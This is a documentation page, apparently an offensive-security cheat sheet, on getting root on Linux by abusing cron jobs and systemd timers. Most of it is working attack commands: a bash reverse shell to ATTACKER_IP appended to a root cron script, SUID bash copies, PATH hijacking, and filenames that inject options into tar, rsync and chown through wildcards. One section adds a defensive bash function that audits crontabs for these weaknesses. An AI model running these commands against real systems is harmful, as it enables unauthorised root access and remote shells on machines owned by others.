Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Enumerate Cron Jobs

crontab -l
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
cat /var/spool/cron/crontabs/* 2>/dev/null

Watch for Cron Execution (pspy)

./pspy64
Look for commands run by UID 0 (root).

Writable Cron Scripts

If a cron job runs a script as root and you can write to it:

Check Permissions

ls -la /path/to/cron-script.sh

Inject Reverse Shell

echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /path/to/cron-script.sh

Inject SUID bash

echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /path/to/cron-script.sh
Wait for the cron job to run, then:
/tmp/rootbash -p

PATH Hijacking

If the PATH set in /etc/crontab lists a writable directory before the system directories (cron searches it left to right):
# Example /etc/crontab:
# PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin
# * * * * * root backup.sh
If the job calls backup.sh without a full path and /home/user is writable, the copy in /home/user is found first:
echo '#!/bin/bash' > /home/user/backup.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/backup.sh
chmod +x /home/user/backup.sh

Wildcard Injection

tar Wildcard

If cron runs:
cd /home/user && tar czf /tmp/backup.tar.gz *
The shell expands * to the names of the files in the directory, so each filename becomes an argument to tar. Files whose names look like tar options are parsed as options:
echo '' > '/home/user/--checkpoint=1'
echo '' > '/home/user/--checkpoint-action=exec=sh shell.sh'
echo '#!/bin/bash' > /home/user/shell.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/shell.sh
chmod +x /home/user/shell.sh

rsync Wildcard

If cron runs:
rsync -a /home/user/* /backup/
echo '' > '/home/user/-e sh shell.sh'
echo '#!/bin/bash' > /home/user/shell.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/shell.sh
chmod +x /home/user/shell.sh

chown Wildcard

If cron runs:
chown root:root /home/user/*
chown parses option-shaped filenames the same way:
echo '' > '/home/user/--reference=/etc/passwd'
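From the defender's side, the weaknesses in the sections above (world-writable job scripts, a world-writable directory in cron's PATH, commands invoked without a full path, and wildcards in the command) can all be spotted by reading the crontab itself. The following audit function is an added example, not part of the original page or of any tool it mentions; the crontab it is run against is constructed, and the builtin allowlist (cd, export, umask, exit) is an assumption.

```bash
#!/bin/bash
# Audit a system-crontab-format file (m h dom mon dow user command) for the
# weaknesses above and print one "FINDING: ..." line per issue. The body runs
# in a subshell so 'set -f' (no glob expansion of the crontab's own '*') and
# the IFS changes stay local to the function.
audit_crontab() (
    set -f
    file=$1
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|'#'*) continue ;;
            PATH=*)                      # PATH hijacking: is any listed directory world-writable?
                IFS=':'
                for dir in ${line#PATH=}; do
                    # -H follows a symlinked dir (e.g. /bin -> usr/bin) instead of testing the link
                    if [ -d "$dir" ] && [ -n "$(find -H "$dir" -maxdepth 0 -perm -0002)" ]; then
                        echo "FINDING: world-writable directory in cron PATH: $dir"
                    fi
                done
                unset IFS; continue ;;
            [A-Za-z_]*=*) continue ;;     # other VAR=value lines (SHELL, MAILTO, ...)
            @*) read -r _ user cmd <<< "$line" ;;            # @reboot / @daily etc.
            *)  read -r _ _ _ _ _ user cmd <<< "$line" ;;    # five schedule fields
        esac
        [ -n "$cmd" ] || continue
        case "$cmd" in *'*'*) echo "FINDING: wildcard in command run by $user: $cmd" ;; esac
        expect=1                          # 1 = the next word is in command position
        for w in $cmd; do
            if [ "$expect" = 1 ]; then
                case "$w" in
                    cd|export|umask|exit) ;;        # assumed shell builtins, not resolved via PATH
                    *=*) continue ;;                # VAR=value prefix; the command is still to come
                    */*) if [ -f "$w" ] && [ -n "$(find -H "$w" -maxdepth 0 -perm -0002)" ]; then
                             echo "FINDING: world-writable script: $w"
                         fi ;;
                    *) echo "FINDING: command \"$w\" has no full path and is resolved via cron PATH" ;;
                esac
                expect=0
            fi
            case "$w" in '&&'|'||'|';'|'|') expect=1 ;; esac   # next word starts a new command
        done
    done < "$file"
    :
)
```

Run it as `audit_crontab /etc/crontab` and over each file in /etc/cron.d/; separators glued to a word (`cmd;`) are not split, so review those lines by hand.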

Writable Cron Directory

If /etc/cron.d/ is writable:
echo '* * * * * root cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' > /etc/cron.d/privesc

Systemd Timers

systemctl list-timers --all
Check the service unit behind each timer for a writable script:
systemctl cat <timer-name>.service
If ExecStart points to a writable file, the same injection as for writable cron scripts applies.

Overwrite /etc/crontab

If /etc/crontab is writable:
echo '* * * * * root /tmp/shell.sh' >> /etc/crontab